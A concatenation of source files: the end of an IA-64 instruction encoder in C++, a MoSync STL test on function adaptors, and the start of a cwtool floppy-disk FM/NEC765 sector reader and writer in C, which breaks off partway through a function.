opc_enc.I20_I23_I24_M20_M21(1,1),
imm_enc.I20_M20_M21(target25, curr_ip),
reg_enc.I20_M20_M21(src),
pred
);
}
void Merced_Encoder::ipf_chk_f_s(unsigned src, unsigned target25, unsigned pred) {
unsigned curr_ip = _offset;
encode( // M21
opc_enc.I20_I23_I24_M20_M21(1,3),
imm_enc.I20_M20_M21(target25, curr_ip),
reg_enc.I20_M20_M21(src),
pred
);
}
void Merced_Encoder::ipf_ld(Int_Mem_Size size, Ld_Flag flag, Mem_Hint hint, unsigned dest, unsigned addrreg, unsigned pred)
{
unsigned x6 = (flag << 2) + size;
encode( // 4.4.1.1
opc_enc.M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(4, x6, hint, 0, 0),
0,
reg_enc.R3_R1(addrreg, dest),
pred
);
}
void Merced_Encoder::ipf_ld_inc_reg(Int_Mem_Size size, Ld_Flag flag, Mem_Hint hint, unsigned dest, unsigned addrreg, unsigned inc_reg, unsigned pred)
{
unsigned x6 = (flag << 2) + size;
encode( // 4.4.1.2
opc_enc.M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(4, x6, hint, 0, 1),
0,
reg_enc.R3_R2_R1(addrreg, inc_reg, dest),
pred
);
}
void Merced_Encoder::ipf_ld_inc_imm(Int_Mem_Size size, Ld_Flag flag, Mem_Hint hint, unsigned dest, unsigned addrreg, unsigned inc_imm, unsigned pred)
{
unsigned x6 = (flag << 2) + size;
encode( // 4.4.1.3
opc_enc.M3_M5_M8_M10_M15(5, x6, hint),
imm_enc.M3_M8_M15(inc_imm),
reg_enc.R3_R1(addrreg, dest),
pred
);
}
void Merced_Encoder::ipf_st(Int_Mem_Size size, St_Flag flag, Mem_Hint hint, unsigned addrreg, unsigned src, unsigned pred)
{
unsigned x6 = ((flag << 2) + size) + 0x30;
// make sure hint != 2
encode( // 4.4.1.4
opc_enc.M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(4, x6, hint, 0, 0),
0,
reg_enc.R3_R2(addrreg, src),
pred
);
}
void Merced_Encoder::ipf_st_inc_imm(Int_Mem_Size size, St_Flag flag, Mem_Hint hint, unsigned addrreg, unsigned src, unsigned inc_imm, unsigned pred)
{
unsigned x6 = ((flag << 2) + size) + 0x30;
// make sure hint != 2
encode( // 4.4.1.5
opc_enc.M3_M5_M8_M10_M15(5, x6, hint),
imm_enc.M5_M10(inc_imm),
reg_enc.R3_R2(addrreg, src),
pred
);
}
void Merced_Encoder::ipf_lfetch(bool exclusive, bool fault, Lfetch_Hint hint, unsigned addrreg, unsigned pred)
{
unsigned x6 = 0x2C;
if (exclusive)
x6++;
if (fault)
x6 += 2;
encode ( // M13
opc_enc.M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(6,x6,hint,0,0),
0,
reg_enc.R3(addrreg),
pred
);
}
void Merced_Encoder::ipf_setf(FReg_Convert form, unsigned fdest, unsigned src, unsigned pred)
{
encode( // 4.4.4.1
opc_enc.M18_M19(6, 0, (0x1C+form), 1),
0,
reg_enc.R2_R1(src, fdest),
pred
);
}
void Merced_Encoder::ipf_getf(FReg_Convert form, unsigned dest, unsigned fsrc, unsigned pred)
{
encode( // 4.4.4.2
opc_enc.M18_M19(4, 0, (0x1C+form), 1),
0,
reg_enc.R2_R1(fsrc, dest),
pred
);
}
void Merced_Encoder::ipf_fma(Float_Precision pc, Float_Status_Field sf, unsigned dest, unsigned src1, unsigned src2, unsigned src3, unsigned pred)
{
unsigned opcode = (pc & 0x2) ? 0x9 : 0x8; // either 9 or 8
unsigned x = (pc & 0x1) ? 1 : 0; // either 1 or 0
encode( // 4.6.1.1
opc_enc.F1_F2_F3(opcode, x, sf),
0,
reg_enc.F4_F3_F2_F1(src2, src1, src3, dest),
pred
);
}
void Merced_Encoder::ipf_fnma(Float_Precision pc, Float_Status_Field sf, unsigned dest, unsigned src1, unsigned src2, unsigned src3, unsigned pred)
{
unsigned opcode = (pc & 0x2) ? 0xD : 0xC; // either D or C
unsigned x = (pc & 0x1) ? 1 : 0; // either 1 or 0
encode( // 4.6.1.1
opc_enc.F1_F2_F3(opcode, x, sf),
0,
reg_enc.F4_F3_F2_F1(src2, src1, src3, dest),
pred
);
}
void Merced_Encoder::ipf_fms(Float_Precision pc, Float_Status_Field sf, unsigned dest, unsigned src1, unsigned src2, unsigned src3, unsigned pred)
{
unsigned opcode = (pc & 0x2) ? 0xB : 0xA; // either B or A
unsigned x = (pc & 0x1) ? 1 : 0; // either 1 or 0
encode( // 4.6.1.1
opc_enc.F1_F2_F3(opcode, x, sf),
0,
reg_enc.F4_F3_F2_F1(src2, src1, src3, dest),
pred
);
}
void Merced_Encoder::ipf_frcpa(Float_Status_Field sf, unsigned dest, unsigned p2, unsigned src1, unsigned src2, unsigned pred)
{
unsigned opcode = 0;
unsigned x = 1;
unsigned q = 0;
encode(
opc_enc.F6(opcode, q, sf, x),
0,
reg_enc.P2_F3_F2_F1(p2, src2, src1, dest),
pred
);
}
void Merced_Encoder::ipf_fmerge(Float_Merge fm, unsigned dest, unsigned src1, unsigned src2, unsigned pred)
{
encode( // 4.6.1.1
opc_enc.F8_F9_F10_F11_F12_F13(0, 0, (0x10+fm)),
0,
reg_enc.F3_F2_F1(src2, src1, dest),
pred
);
}
void Merced_Encoder::ipf_fcmp(Float_Comp_Rel xcr, Compare_Extension cx, unsigned xp1, unsigned xp2, unsigned xf2, unsigned xf3, unsigned pred)
{
unsigned ra = 0, rb = 0, sf, ta = 0, p1=xp1, p2=xp2, f2=xf2, f3=xf3;
Float_Comp_Rel cr;
switch (xcr)
{ //switch predicates
case fcmp_neq:
case fcmp_nlt:
case fcmp_nle:
case fcmp_ngt:
case fcmp_nge:
case fcmp_ord:
p1 = xp2; p2 = xp1;break;
default: break;
}
switch (xcr)
{ // switch registers
case fcmp_gt:
case fcmp_ge:
case fcmp_ngt:
case fcmp_nge:
f2 = xf3;
f3 = xf2;
break;
default: break;
}
switch (xcr)
{ // reassign cr
case fcmp_eq:
case fcmp_neq:
cr = fcmp_eq;
ra = 0; rb = 0;
break;
case fcmp_lt:
case fcmp_gt:
case fcmp_nlt:
case fcmp_ngt:
cr = fcmp_lt;
ra = 0; rb = 1;
break;
case fcmp_le:
case fcmp_ge:
case fcmp_nle:
case fcmp_nge:
cr = fcmp_le;
ra = 1; rb = 0;
break;
case fcmp_unord:
case fcmp_ord:
cr = fcmp_unord;
ra = 1; rb = 1;
break;
default:
assert(0); // compare type not covered
}
switch (cx)
{ // assign ta
case cmp_none:
ta = 0; break;
case cmp_unc:
ta = 1; break;
default:
assert(0);
}
sf = 0;
encode( // 4.6.3.1
opc_enc.F4(4, rb, sf, ra, ta),
0,
reg_enc.P2_P1_F3_F2(p2, p1, f3, f2),
pred
);
}
void Merced_Encoder::ipf_fclass(Compare_Extension cx, unsigned p1, unsigned p2, unsigned f2, unsigned fclass9, unsigned pred)
{
unsigned fc2 = fclass9 & 3;
unsigned fclass7c = fclass9 >> 2;
unsigned ta = 0;
switch (cx)
{ // assign ta
case cmp_none:
ta = 0; break;
case cmp_unc:
ta = 1; break;
default:
assert(0);
}
encode( // 4.6.3.2
opc_enc.F5(5, fc2, fclass7c, ta),
0,
reg_enc.P2_P1_F2(p2, p1, f2),
pred
);
}
void Merced_Encoder::ipf_fcvt_fx(FFix_Convert fc, Float_Status_Field sf, unsigned dest, unsigned src, unsigned pred)
{
encode( // 4.6.7.1
opc_enc.F8_F9_F10_F11_F12_F13(0, 0, (0x18+fc), sf),
0,
reg_enc.F2_F1(src, dest),
pred
);
}
void Merced_Encoder::ipf_fcvt_xf(unsigned dest, unsigned src, unsigned pred)
{
encode( // 4.6.7.2
opc_enc.F8_F9_F10_F11_F12_F13(0, 0, 0x1C, 0),
0,
reg_enc.F2_F1(src, dest),
pred
);
}
void Merced_Encoder::ipf_ldf(Float_Mem_Size size, Ld_Flag flag, Mem_Hint hint, unsigned dest, unsigned addrreg, unsigned pred)
{
unsigned x6;
if (flag == mem_ld_fill)
x6 = 0x1B;
else
x6 = (flag << 2) + size;
encode( // 4.4.1.6
opc_enc.M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(6, x6, hint, 0, 0),
0,
reg_enc.R3_R1(addrreg, dest),
pred
);
}
void Merced_Encoder::ipf_ldf_inc_reg(Float_Mem_Size size, Ld_Flag flag, Mem_Hint hint, unsigned dest, unsigned addrreg, unsigned inc_reg, unsigned pred)
{
unsigned x6;
if (flag == mem_ld_fill)
x6 = 0x1B;
else
x6 = (flag << 2) + size;
encode( // 4.4.1.7
opc_enc.M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(6, x6, hint, 0, 1),
0,
reg_enc.R3_R2_R1(addrreg, inc_reg, dest),
pred
);
}
void Merced_Encoder::ipf_ldf_inc_imm(Float_Mem_Size size, Ld_Flag flag, Mem_Hint hint, unsigned dest, unsigned addrreg, unsigned inc_imm, unsigned pred)
{
unsigned x6;
if (flag == mem_ld_fill)
x6 = 0x1B;
else
x6 = (flag << 2) + size;
encode( // 4.4.1.8
opc_enc.M3_M5_M8_M10_M15(7, x6, hint),
imm_enc.M3_M8_M15(inc_imm),
reg_enc.R3_R1(addrreg, dest),
pred
);
}
void Merced_Encoder::ipf_stf(Float_Mem_Size size, St_Flag flag, Mem_Hint hint, unsigned addrreg, unsigned src, unsigned pred)
{
unsigned x6;
if (flag == mem_st_spill)
x6 = 0x3B;
else
x6 = ((flag << 2) + size) + 0x30;
// make sure hint != 2
encode( // 4.4.1.9
opc_enc.M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(6, x6, hint, 0, 0),
0,
reg_enc.R3_R2(addrreg, src),
pred
);
}
void Merced_Encoder::ipf_stf_inc_imm(Float_Mem_Size size, St_Flag flag, Mem_Hint hint, unsigned addrreg, unsigned src, unsigned inc_imm, unsigned pred)
{
unsigned x6;
if (flag == mem_st_spill)
x6 = 0x3B;
else
x6 = ((flag << 2) + size) + 0x30;
// make sure hint != 2
encode( // 4.4.1.10
opc_enc.M3_M5_M8_M10_M15(7, x6, hint),
imm_enc.M5_M10(inc_imm),
reg_enc.R3_R2(addrreg, src),
pred
);
}
void Merced_Encoder::ipf_alloc(unsigned dest, unsigned i, unsigned l, unsigned o, unsigned r)
{
encode( // 4.4.9.1
opc_enc.M20_M21_M22_M23_M34(1, 6),
imm_enc.M34(i+l, o, r),
reg_enc.R1(dest)
);
}
void Merced_Encoder::ipf_mtbr(unsigned bdest, unsigned src, Branch_Predict_Whether_Hint wh, bool ret, unsigned offset, unsigned pred)
{
unsigned curr_ip = _offset;
unsigned x = (ret ? 1 : 0);
unsigned ih = 0; // not important
unsigned tag13 = curr_ip + offset;
encode( // 4.3.6.1
opc_enc.I21(0, 7, ih, x, wh, 0, 0),
imm_enc.I21(tag13, curr_ip),
reg_enc.R2_B1(src, bdest),
pred
);
}
void Merced_Encoder::ipf_mfbr(unsigned dest, unsigned bsrc, unsigned pred)
{
encode( // 4.3.6.2
opc_enc.I19_I22_I25_I26_I27_I28_I29_M29_M31(0, 0, 0x31),
0,
reg_enc.B2_R1(bsrc, dest),
pred
);
}
void Merced_Encoder::ipf_mtap(EM_Application_Register adest, unsigned src, unsigned pred)
{
unsigned opcode = 0, x6 = 0;
switch (adest)
{
case AR_kr0:
case AR_kr1:
case AR_kr2:
case AR_kr3:
case AR_kr4:
case AR_kr5:
case AR_kr6:
case AR_kr7:
case AR_rsc:
case AR_bsp:
case AR_bspstore:
case AR_rnat:
case AR_fcr:
case AR_eflag:
case AR_csd:
case AR_ssd:
case AR_cflg:
case AR_fsr:
case AR_fir:
case AR_fdr:
case AR_ccv:
case AR_unat:
case AR_fpsr:
case AR_itc:
// M template
opcode = 1;
x6 = 0x2a;
break;
case AR_pfs:
case AR_lc:
case AR_ec:
// I template
opcode = 0;
x6 = 0x2a;
break;
default:
assert(0);
}
encode( // 4.3.8.1 and 4.4.7.1
opc_enc.I19_I22_I25_I26_I27_I28_I29_M29_M31(opcode, 0, x6),
0,
reg_enc.R3_R2(adest, src),
pred
);
}
void Merced_Encoder::ipf_mfap(unsigned dest, EM_Application_Register asrc, unsigned pred)
{
unsigned opcode = 0, x6 = 0;
switch (asrc)
{
case AR_kr0:
case AR_kr1:
case AR_kr2:
case AR_kr3:
case AR_kr4:
case AR_kr5:
case AR_kr6:
case AR_kr7:
case AR_rsc:
case AR_bsp:
case AR_bspstore:
case AR_rnat:
case AR_fcr:
case AR_eflag:
case AR_csd:
case AR_ssd:
case AR_cflg:
case AR_fsr:
case AR_fir:
case AR_fdr:
case AR_ccv:
case AR_unat:
case AR_fpsr:
case AR_itc:
// M template
opcode = 1;
x6 = 0x22;
break;
case AR_pfs:
case AR_lc:
case AR_ec:
// I template
opcode = 0;
x6 = 0x32;
break;
default:
assert(0);
}
encode( // 4.3.8.3 and 4.4.7.3
opc_enc.I19_I22_I25_I26_I27_I28_I29_M29_M31(opcode, 0, x6),
0,
reg_enc.R3_R1(asrc, dest),
pred
);
}
void Merced_Encoder::ipf_movip(unsigned dest, unsigned pred)
{
encode( // 4.3.7.3
opc_enc.I19_I22_I25_I26_I27_I28_I29_M29_M31(0, 0, 0x30),
0,
reg_enc.R1(dest),
pred
);
}
void Merced_Encoder::ipf_xma(unsigned dest, unsigned src1, unsigned src2, unsigned src3, Xla_Flag flag, unsigned pred)
{
unsigned opcode = 0xE;
unsigned x = 1;
unsigned x2 = flag;
encode( // 4.6.1.1
opc_enc.F1_F2_F3(opcode, x, x2),
0,
reg_enc.F4_F3_F2_F1(src2, src1, src3, dest),
pred
);
}
void Merced_Encoder::ipf_cmpxchg(Int_Mem_Size size, Cmpxchg_Flag flag, Mem_Hint hint, unsigned dest, unsigned r3, unsigned r2, unsigned pred)
{
unsigned x6 = (flag << 2) + size;
encode( // 4.4.1.1
opc_enc.M1_M2_M4_M6_M7_M9_M11_M12_M13_M14_M16_M17(4, x6, hint, 1, 0),
0,
reg_enc.R3_R2_R1(r3, r2, dest),
pred
);
}
void Merced_Encoder::ipf_mtpr(unsigned src1, unsigned mask17, unsigned pred)
{
encode( // 4.3.6.1
opc_enc.I20_I23_I24_M20_M21(0, 3),
imm_enc.I23(mask17),
reg_enc.R2(src1),
pred
);
}
void Merced_Encoder::ipf_mtpr_rot(unsigned imm28, unsigned pred)
{
encode( // 4.3.6.2
opc_enc.I20_I23_I24_M20_M21(0, 2),
imm_enc.I24(imm28),
0,
pred);
}
void Merced_Encoder::ipf_mfpr(unsigned dest, unsigned pred)
{
encode( // 4.3.6.3
opc_enc.I25(0, 0, 0x33),
0,
reg_enc.R1(dest),
pred);
}
void Merced_Encoder::ipf_cover()
{
encode( // 4.5.3.1
opc_enc.B8_B9(0, 2),
0,
0,
0);
} //Merced_Encoder::ipf_cover
void Merced_Encoder::ipf_flushrs()
{
encode( // 4.4.6.2
//unsigned M24_M25_M26_M37(unsigned opcode, unsigned x3, unsigned x4, unsigned x2);
opc_enc.M24_M25_M26_M37(0, 0, 0xc, 0),
0,
0,
0);
} //Merced_Encoder::ipf_flushrs
void Merced_Encoder::ipf_mf(unsigned pred) {
encode( // M24
opc_enc.M24_M25_M26_M27_M37(0, 0, 2, 2),
0,
0,
pred);
}
| gpl-2.0 |
MoSync/MoSync | testPrograms/unitTestSTL/Algorithms/FunctionPointerAdaptors.cpp | 2 | 3555 | /* Copyright 2013 David Axmark
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
*/
/**
* @file FunctionPointerAdaptors.cpp
* @author Gabriela Rata
*/
#include <functional>
#include "../TestSTL.h"
#include "../Employee.h"
/**
* STL function adaptors make assumptions about the functors they use.
* See AboutFunctors.cpp for what is a functor and Adaptors.cpp on what is an adaptor.
* Adaptors.cpp describes also the adaptors provided by STL.
* The function adapters need to know the argument type and the return value of the operator().
* So, a STL function adaptor requires that the supplied functor object provides the
* the following public type definitions:
* - for unary functors:
* argument_type -> for the argument type of the operator().
* return_type -> for the return type of the operator().
* - for binary functors:
* first_argument_type -> for the first argument type of operator()
* second_argument_type -> for the second argument type of operator()
* return_type -> for the return type of the operator().
* STL provides two templates that have these type definitions: unary_function
* and binary_function.
* The definitions are simple:
*
* template<class ArgumentType, class ResultType>
* struct unary_function
* {
* typedef ArgumentType argument_type;
* typedef ResultType result_type;
* };
*
* template<class FirstArgumentType, class SecondArgumentType, class ResultType>
* struct binary_function
* {
* typedef FirstArgumentType first_argument_type;
* typedef SecondArgumentType second_argument_type;
* typedef ResultType result_type;
* }
*
* All the STL functors provide the type definitions required by functor adapters.
* If we want to use our own functors, with the STL functor adaptors, we can derive
* from unary_function/binary_function. They are provided so that the user doesn't
* have to manually write these typedefs.
*
* unary_function and binary_function are defined <functional> header.
*/
struct MyFirstFunctor
{
bool operator()(const Employee &lv, const Employee &rv)
{
return lv.getName() < rv.getName();
}
};
struct MySecondFunctor : public std::binary_function<Employee, Employee, bool>
{
bool operator()(const Employee &lv, const Employee &rv)
{
return lv.getName() < rv.getName();
}
};
void TestSTL::example_function_pointer_adapters()
{
/**
* using an STL functor (std::less) with an STL functor adaptor (bind1st).
* Always works because the STL functors provide the right typedefs.
*/
std::bind1st(std::less<int>(), 101); //ok
/**
* using an STL functor adapter (bind1st) with a non standard functor (MyFirstFunctor).
* Doesn't work because "MyFirstFunctor" doesn't provide the typedefs that
* STL functor adaptors need.
*/
//std::bind1st(MyFirstFunctor(), Employee(10, "Bob")); //doesn't compile
/**
* using an STL functor adapter (bind1st) with a non standard functor (MySecondFunctor).
* It's work because "MySecondFunctor" inherits from std::binary_function.
*/
std::bind1st(MySecondFunctor(), Employee(10, "Bob")); //compiles
}
| gpl-2.0 |
glaubitz/cw | src/cwtool/format/fm_nec765.c | 2 | 30500 | /****************************************************************************
****************************************************************************
*
* format/fm_nec765.c
*
****************************************************************************
****************************************************************************/
#include <stdio.h>
#include "fm_nec765.h"
#include "../error.h"
#include "../debug.h"
#include "../verbose.h"
#include "../global.h"
#include "../options.h"
#include "../disk.h"
#include "../fifo.h"
#include "../format.h"
#include "fm.h"
#include "range.h"
#include "bitstream.h"
#include "container.h"
#include "match_simple.h"
#include "postcomp_simple.h"
#include "histogram.h"
#include "setvalue.h"
/****************************************************************************
*
* functions for sector and track handling
*
****************************************************************************/
#define HEADER_SIZE 6
#define DATA_SIZE 16386
#define FLAG_RD_IGNORE_SECTOR_SIZE (1 << 0)
#define FLAG_RD_IGNORE_CHECKSUMS (1 << 1)
#define FLAG_RD_IGNORE_TRACK_MISMATCH (1 << 2)
#define FLAG_RD_MATCH_SIMPLE (1 << 3)
#define FLAG_RD_MATCH_SIMPLE_FIXUP (1 << 4)
#define FLAG_RD_POSTCOMP_SIMPLE (1 << 5)
#define FLAG_RW_CRC16_INIT_VALUE1_SET (1 << 0)
#define FLAG_RW_CRC16_INIT_VALUE2_SET (1 << 1)
#define FLAG_RW_CRC16_INIT_VALUE3_SET (1 << 2)
/****************************************************************************
* fm_nec765_track_number
****************************************************************************/
static cw_count_t
fm_nec765_track_number(
struct fm_nec765 *fm_nec,
cw_count_t cwtool_track,
cw_count_t format_track,
cw_count_t format_side)
{
if ((format_track == -1) && (format_side == -1)) return (cwtool_track / 2);
return (format_track);
}
/****************************************************************************
* fm_nec765_side_number
****************************************************************************/
static cw_count_t
fm_nec765_side_number(
struct fm_nec765 *fm_nec,
cw_count_t cwtool_track,
cw_count_t format_track,
cw_count_t format_side)
{
if ((format_track == -1) && (format_side == -1)) return (cwtool_track % 2);
return (format_side);
}
/****************************************************************************
* fm_nec765_sector_shift
****************************************************************************/
static int
fm_nec765_sector_shift(
struct fm_nec765 *fm_nec,
int sector)
{
return (fm_get_sector_shift(fm_nec->rw.pshift, sector, GLOBAL_NR_SECTORS));
}
/****************************************************************************
* fm_nec765_sector_size
****************************************************************************/
static int
fm_nec765_sector_size(
struct fm_nec765 *fm_nec,
int sector)
{
int shift = fm_nec765_sector_shift(fm_nec, sector);
if (shift == -1) shift = 0;
return (0x80 << shift);
}
/****************************************************************************
* fm_nec765_read_sector2
****************************************************************************/
static int
fm_nec765_read_sector2(
struct fifo *ffo_l1,
struct fm_nec765 *fm_nec,
struct disk_error *dsk_err,
struct range_sector *rng_sec,
unsigned char *header,
unsigned char *data)
{
int bitofs, data_size, result;
*dsk_err = (struct disk_error) { };
if (fm_read_sync(ffo_l1, range_sector_header(rng_sec), fm_nec->rw.sync_value1, fm_nec->rw.sync_value1) == -1) return (-1);
bitofs = fifo_get_rd_bitofs(ffo_l1);
if (fm_read_bytes(ffo_l1, dsk_err, header, HEADER_SIZE) == -1) return (-1);
range_set_end(range_sector_header(rng_sec), fifo_get_rd_bitofs(ffo_l1));
data_size = fm_nec765_sector_size(fm_nec, header[2] - 1);
result = fm_read_sync(ffo_l1, range_sector_data(rng_sec), fm_nec->rw.sync_value2, fm_nec->rw.sync_value3);
if (result == -1) return (-1);
if (fm_read_bytes(ffo_l1, dsk_err, data, data_size + 2) == -1) return (-1);
range_set_end(range_sector_data(rng_sec), fifo_get_rd_bitofs(ffo_l1));
verbose_message(GENERIC, 2, "rewinding to bit offset %d", bitofs);
fifo_set_rd_bitofs(ffo_l1, bitofs);
return (result);
}
/****************************************************************************
* fm_nec765_write_sector2
****************************************************************************/
static int
fm_nec765_write_sector2(
struct fifo *ffo_l1,
struct fm_nec765 *fm_nec,
unsigned char *header,
unsigned char *data,
int data_size)
{
if (fm_write_fill(ffo_l1, fm_nec->wr.fill_value2, fm_nec->wr.fill_length2) == -1) return (-1);
if (fm_write_fill(ffo_l1, fm_nec->wr.fill_value3, fm_nec->wr.fill_length3) == -1) return (-1);
if (fm_write_sync(ffo_l1, fm_nec->rw.sync_value1, 1) == -1) return (-1);
if (fm_write_bytes(ffo_l1, header, HEADER_SIZE) == -1) return (-1);
if (fm_write_fill(ffo_l1, fm_nec->wr.fill_value4, fm_nec->wr.fill_length4) == -1) return (-1);
if (fm_write_fill(ffo_l1, fm_nec->wr.fill_value5, fm_nec->wr.fill_length5) == -1) return (-1);
if (fm_write_sync(ffo_l1, fm_nec->rw.sync_value2, 1) == -1) return (-1);
if (fm_write_bytes(ffo_l1, data, data_size) == -1) return (-1);
return (1);
}
/****************************************************************************
* fm_nec765_read_sector
****************************************************************************/
static int
fm_nec765_read_sector(
struct fifo *ffo_l1,
struct fm_nec765 *fm_nec,
struct container *con,
struct disk_sector *dsk_sct,
cw_count_t cwtool_track,
cw_count_t format_track,
cw_count_t format_side)
{
struct disk_error dsk_err;
struct range_sector rng_sec = RANGE_SECTOR_INIT;
unsigned char header[HEADER_SIZE];
unsigned char data[DATA_SIZE];
int result, track, side, sector, data_size;
int init = fm_nec->rw.crc16_init_value2;
result = fm_nec765_read_sector2(ffo_l1, fm_nec, &dsk_err, &rng_sec, header, data);
if (result == -1) return (-1);
if (result == 1) init = fm_nec->rw.crc16_init_value3;
/* accept only valid sector numbers */
track = fm_nec765_track_number(fm_nec, cwtool_track, format_track, format_side);
side = fm_nec765_side_number(fm_nec, cwtool_track, format_track, format_side);
sector = header[2] - 1;
if ((sector < 0) || (sector >= fm_nec->rw.sectors))
{
verbose_message(GENERIC, 1, "sector %d out of range", sector);
return (0);
}
verbose_message(GENERIC, 1, "got sector %d", sector);
/* check sector quality */
data_size = 1 << (header[3] + 7);
result = format_compare2("sector size: got %d, expected %d", data_size, fm_nec765_sector_size(fm_nec, sector));
if (result > 0) verbose_message(GENERIC, 2, "wrong sector size on sector %d", sector);
if (fm_nec->rd.flags & FLAG_RD_IGNORE_SECTOR_SIZE) disk_warning_add(&dsk_err, result);
else disk_error_add(&dsk_err, DISK_ERROR_FLAG_SIZE, result);
data_size = fm_nec765_sector_size(fm_nec, sector);
result = format_compare2("header crc16 checksum: got 0x%04x, expected 0x%04x", fm_read_u16_be(&header[4]), fm_crc16(fm_nec->rw.crc16_init_value1, header, 4));
result += format_compare2("data crc16 checksum: got 0x%04x, expected 0x%04x", fm_read_u16_be(&data[data_size]), fm_crc16(init, data, data_size));
if (result > 0) verbose_message(GENERIC, 2, "checksum error on sector %d", sector);
if (fm_nec->rd.flags & FLAG_RD_IGNORE_CHECKSUMS) disk_warning_add(&dsk_err, result);
else disk_error_add(&dsk_err, DISK_ERROR_FLAG_CHECKSUM, result);
result = format_compare2("track: got %d, expected %d", header[0], track);
result += format_compare2("side: got %d, expected %d", header[1], side);
if (result > 0) verbose_message(GENERIC, 2, "track or side mismatch on sector %d", sector);
if (fm_nec->rd.flags & FLAG_RD_IGNORE_TRACK_MISMATCH) disk_warning_add(&dsk_err, result);
else disk_error_add(&dsk_err, DISK_ERROR_FLAG_NUMBERING, result);
/*
* take the data if the found sector is of better quality than the
* current one
*/
range_sector_set_number(&rng_sec, sector);
if (con != NULL) container_append_range_sector(con, &rng_sec);
disk_set_sector_number(&dsk_sct[sector], sector);
disk_sector_read(&dsk_sct[sector], &dsk_err, data);
return (1);
}
/****************************************************************************
* fm_nec765_write_sector
****************************************************************************/
static int
fm_nec765_write_sector(
struct fifo *ffo_l1,
struct fm_nec765 *fm_nec,
struct disk_sector *dsk_sct,
cw_count_t cwtool_track,
cw_count_t format_track,
cw_count_t format_side)
{
unsigned char header[HEADER_SIZE];
unsigned char data[DATA_SIZE];
int sector = disk_get_sector_number(dsk_sct);
int data_size;
verbose_message(GENERIC, 1, "writing sector %d", sector);
header[0] = fm_nec765_track_number(fm_nec, cwtool_track, format_track, format_side);
header[1] = fm_nec765_side_number(fm_nec, cwtool_track, format_track, format_side);
header[2] = sector + 1;
header[3] = fm_nec765_sector_shift(fm_nec, sector);
data_size = fm_nec765_sector_size(fm_nec, sector);
fm_write_u16_be(&header[4], fm_crc16(fm_nec->rw.crc16_init_value1, header, 4));
disk_sector_write(data, dsk_sct);
fm_write_u16_be(&data[data_size], fm_crc16(fm_nec->rw.crc16_init_value2, data, data_size));
return (fm_nec765_write_sector2(ffo_l1, fm_nec, header, data, data_size + 2));
}
/****************************************************************************
* fm_nec765_statistics
****************************************************************************/
static int
fm_nec765_statistics(
union format *fmt,
struct fifo *ffo_l0,
cw_count_t cwtool_track,
cw_count_t format_track,
cw_count_t format_side)
{
histogram_normal(
ffo_l0,
cwtool_track,
fm_nec765_track_number(&fmt->fm_nec, cwtool_track, format_track, format_side),
fm_nec765_side_number(&fmt->fm_nec, cwtool_track, format_track, format_side));
if (fmt->fm_nec.rd.flags & FLAG_RD_POSTCOMP_SIMPLE) histogram_postcomp_simple(
ffo_l0,
fmt->fm_nec.rw.bnd,
2,
cwtool_track,
fm_nec765_track_number(&fmt->fm_nec, cwtool_track, format_track, format_side),
fm_nec765_side_number(&fmt->fm_nec, cwtool_track, format_track, format_side));
return (1);
}
/****************************************************************************
* fm_nec765_read_track2
****************************************************************************/
static void
fm_nec765_read_track2(
union format *fmt,
struct container *con,
struct fifo *ffo_l0,
struct fifo *ffo_l3,
struct disk_sector *dsk_sct,
cw_count_t cwtool_track,
cw_count_t format_track,
cw_count_t format_side)
{
unsigned char data[GLOBAL_MAX_TRACK_SIZE];
struct fifo ffo_l1 = FIFO_INIT(data, sizeof (data));
if (fmt->fm_nec.rd.flags & FLAG_RD_POSTCOMP_SIMPLE) postcomp_simple(ffo_l0, fmt->fm_nec.rw.bnd, 2);
bitstream_read(ffo_l0, &ffo_l1, fmt->fm_nec.rw.bnd, 2);
while (fm_nec765_read_sector(&ffo_l1, &fmt->fm_nec, con, dsk_sct, cwtool_track, format_track, format_side) != -1) ;
}
/****************************************************************************
* fm_nec765_read_track
****************************************************************************/
static int
fm_nec765_read_track(
union format *fmt,
struct container *con,
struct fifo *ffo_l0,
struct fifo *ffo_l3,
struct disk_sector *dsk_sct,
cw_count_t cwtool_track,
cw_count_t format_track,
cw_count_t format_side)
{
struct match_simple_info mat_sim_nfo =
{
.con = con,
.fmt = fmt,
.ffo_l0 = ffo_l0,
.ffo_l3 = ffo_l3,
.dsk_sct = dsk_sct,
.cwtool_track = cwtool_track,
.format_track = format_track,
.format_side = format_side,
.bnd = fmt->fm_nec.rw.bnd,
.bnd_size = 2,
.callback = fm_nec765_read_track2,
.merge_two = fmt->fm_nec.rd.flags & FLAG_RD_MATCH_SIMPLE,
.merge_all = fmt->fm_nec.rd.flags & FLAG_RD_MATCH_SIMPLE,
.fixup = fmt->fm_nec.rd.flags & FLAG_RD_MATCH_SIMPLE_FIXUP
};
if ((fmt->fm_nec.rd.flags & FLAG_RD_MATCH_SIMPLE) || (options_get_output())) match_simple(&mat_sim_nfo);
else fm_nec765_read_track2(fmt, NULL, ffo_l0, ffo_l3, dsk_sct, cwtool_track, format_track, format_side);
return (1);
}
/****************************************************************************
* fm_nec765_write_track
****************************************************************************/
static int
fm_nec765_write_track(
union format *fmt,
struct fifo *ffo_l3,
struct disk_sector *dsk_sct,
struct fifo *ffo_l0,
unsigned char *data,
cw_count_t cwtool_track,
cw_count_t format_track,
cw_count_t format_side)
{
unsigned char data_l1[GLOBAL_MAX_TRACK_SIZE];
struct fifo ffo_l1 = FIFO_INIT(data_l1, sizeof (data_l1));
int i;
if (fm_write_fill(&ffo_l1, fmt->fm_nec.wr.prolog_value, fmt->fm_nec.wr.prolog_length) == -1) return (0);
if (fm_write_fill(&ffo_l1, fmt->fm_nec.wr.fill_value1, fmt->fm_nec.wr.fill_length1) == -1) return (0);
if (fm_write_sync(&ffo_l1, 0xf77a, 1) == -1) return (0);
